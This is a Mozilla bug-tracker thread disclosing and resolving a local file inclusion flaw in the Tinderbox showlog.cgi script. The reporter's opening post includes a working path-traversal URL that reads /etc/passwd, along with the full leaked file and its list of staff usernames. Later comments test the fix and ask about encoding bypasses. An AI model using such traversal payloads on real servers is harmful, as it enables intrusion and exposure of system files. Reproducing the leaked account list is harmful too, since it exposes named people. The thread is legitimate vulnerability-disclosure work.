Closed
Bug 823923
Opened 12 years ago
Closed 12 years ago
local file inclusion vulnerability in Tinderbox
Categories
(Webtools Graveyard :: Tinderbox, defect)
Webtools Graveyard
Tinderbox
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: curtisk, Assigned: mozilla)
References
Details
(Keywords: reporter-external)
Hello,
my name is Fabián Cuchietti, i'm a security researcher... In this research i have found "Local File Inclusion (LFI)".
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page.
this issue by reading some files from the target web server. (IS BUG BOUNTY?)
Url http://tinderbox.mozilla.org/showlog.cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../etc/passwd&buildtime=1356022860&buildname=documentation cg-bugs01&fulltext=1
Parameter Name logfile
Parameter Type Querystring
Attack Pattern ../../../../../../../../../../../etc/passwd
Response:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
nagios:x:101:102:nagios:/var/log/nagios:/bin/sh
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
bonsai:x:522:105::/home/bonsai:/bin/bash
tinderbox:x:521:104::/home/tinderbox:/bin/bash
varnish:x:103:107:Varnish http accelerator user:/var/lib/varnish:/sbin/nologin
nginx:x:104:108:Nginx user:/var/lib/nginx:/bin/false
hpsmh:x:400:400::/opt/hp/hpsmh:/sbin/nologin
_lldpd:x:105:109:LLDP daemon:/var/run/lldpd:/bin/false
infrasec:x:2324:2324::/home/infrasec:/bin/bash
dmoore:x:599:599::/home/dmoore:/bin/bash
bhourigan:x:1734:1734::/home/bhourigan:/bin/bash
arr:x:1556:1556::/home/arr:/bin/tcsh
rtucker:x:1509:1509::/home/rtucker:/bin/bash
rpina:x:1396:1396::/home/rpina:/bin/bash
mburns:x:1726:1726::/home/mburns:/bin/bash
justdave:x:504:504::/home/justdave:/bin/bash
mrz:x:506:506::/home/mrz:/bin/tcsh
gdestuynder:x:1663:1663::/home/gdestuynder:/bin/bash
shyam:x:1137:1137::/home/shyam:/bin/bash
jvier:x:1449:1449::/home/jvier:/bin/bash
jthomas:x:1700:1700::/home/jthomas:/bin/bash
jcrowe:x:1735:1735::/home/jcrowe:/bin/bash
mlarrain:x:1647:1647::/home/mlarrain:/bin/bash
rbryce:x:1736:1736::/home/rbryce:/bin/bash
pchiasson:x:1645:1645::/home/pchiasson:/bin/bash
tmary:x:1592:1592::/home/tmary:/bin/bash
dmitchell:x:1458:1458::/home/dmitchell:/bin/bash
ghuerta:x:1524:1524::/home/ghuerta:/bin/bash
oremj:x:505:505::/home/oremj:/bin/bash
mpressman:x:1595:1595::/home/mpressman:/bin/bash
nmaul:x:1549:1549::/home/nmaul:/bin/bash
mcoates:x:1306:1306::/home/mcoates:/bin/bash
scabral:x:1808:1808::/home/scabral:/bin/bash
ashish:x:1579:1579::/home/ashish:/bin/bash
amilewski:x:1177:1177::/home/amilewski:/bin/bash
eparker:x:1797:1797::/home/eparker:/bin/bash
ckolos:x:1732:1732::/home/ckolos:/bin/bash
jdow:x:1299:1299::/home/jdow:/bin/bash
cshields:x:1047:1047::/home/cshields:/bin/bash
dgherman:x:1562:1562::/home/dgherman:/bin/bash
jstevensen:x:1679:1679::/home/jstevensen:/bin/bash
jlazaro:x:1303:1303::/home/jlazaro:/bin/bash
rsoderberg:x:1432:1432::/home/rsoderberg:/bin/bash
petef:x:1519:1519::/home/petef:/bin/bash
jwatkins:x:1787:1787::/home/jwatkins:/bin/bash
cliang:x:1795:1795::/home/cliang:/bin/bash
ahill2:x:1541:1541::/home/ahill2:/bin/bash
rmilewski:x:1427:1427::/home/rmilewski:/bin/bash
dparsons:x:1724:1724::/home/dparsons:/bin/bash
bkero:x:1369:1369::/home/bkero:/bin/bash
rhelmer:x:1476:1476::/home/rhelmer:/bin/bash
lthomson:x:5506:5506::/home/lthomson:/bin/bash
afernandez:x:1905:1905::/home/afernandez:/bin/bash
cransom:x:1835:1835::/home/cransom:/bin/bash
jhayashi:x:1848:1848::/home/jhayashi:/bin/bash
bobm:x:1925:1925::/home/bobm:/bin/bash
mmayo:x:1788:1788::/home/mmayo:/bin/bash
bburton:x:1868:1868::/home/bburton:/bin/bash
cturra:x:1909:1909::/home/cturra:/bin/bash
dmaher:x:1924:1924::/home/dmaher:/bin/bash
amckay:x:1217:1217::/home/amckay:/bin/bash
eziegenhorn:x:1892:1892::/home/eziegenhorn:/bin/bash
ayounsi:x:1155:1155::/home/ayounsi:/bin/bash
mhenry:x:1927:1927::/home/mhenry:/bin/bash
juber:x:1959:1959::/home/juber:/bin/bash
ossec:x:401:401::/var/ossec:/sbin/nologin
ossecm:x:402:401::/var/ossec:/sbin/nologin
ossecr:x:403:401::/var/ossec:/sbin/nologin
Best regards,
Fabián Cuchietti.
Flags: sec-bounty?
Comment 1•12 years ago
|
||
showlog.cgi file located here
https://mxr.mozilla.org/mozilla/source/webtools/tinderbox/showlog.cgi
Someone else will have to audit the code since I'm not that good at perl.
Comment 2•12 years ago
|
||
You still have not corrected the vulnerability.?
Comment 5•12 years ago
|
||
If we're not going to fix it can we just shut tinderbox down? What hasn't migrated to tbpl?
Flags: sec-bounty? → sec-bounty+
Comment 7•12 years ago
|
||
http://tinderbox.mozilla.org/showlog.cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../etc/passwd&buildtime=1356022860&buildname=documentation
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, root@localhost and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Apache Server at tinderbox.mozilla.org Port 80
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Comment 8•12 years ago
|
||
(In reply to Michael Henry [:tinfoil] from comment #7)
> http://tinderbox.mozilla.org/showlog.
> cgi?tree=Bugzilla&errorparser=unix&logfile=../../../../../../../../../../../
> etc/passwd&buildtime=1356022860&buildname=documentation
Where's the patch that fixed this? Apparently, it was done in bug 842742, which I can't see. Why was a separate bug filed? Work should have been done in this bug. We don't do separate super-hidden bugs for normal security fixes, so why in the world would we do the same here?
The fix, which while it may work, is definitely not the best way to do this:
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&root=/cvsroot&subdir=mozilla/webtools/tinderbox&command=DIFF_FRAMESET&root=/cvsroot&file=showlog.cgi&rev1=1.35&rev2=1.36
Has anybody tried using hex codes for '.' and seeing if it still works (or some other form of obfuscation of the '.')?
Assignee: reed → aki
Assignee | ||
Comment 9•12 years ago
|
||
If you mean .. , f/e, that doesn't work.
Updated•12 years ago
|
Group: webtools-security
Updated•12 years ago
|
Depends on: tinderbox-death
Updated•11 years ago
|
Product: Webtools → Webtools Graveyard
Updated•11 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•